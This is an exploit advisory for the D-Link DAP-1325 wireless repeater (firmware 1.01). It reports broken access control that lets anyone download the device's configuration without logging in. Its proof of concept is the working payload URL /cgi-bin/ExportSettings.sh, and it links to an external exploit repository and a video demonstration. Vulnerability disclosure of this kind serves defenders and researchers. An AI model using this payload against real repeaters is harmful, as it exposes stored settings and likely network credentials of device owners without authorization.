Authored by ieduardogoncalves

D-Link DAP-1325 suffers from an insecure direct object reference vulnerability.

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms


1) Description

Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Add the payload to URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit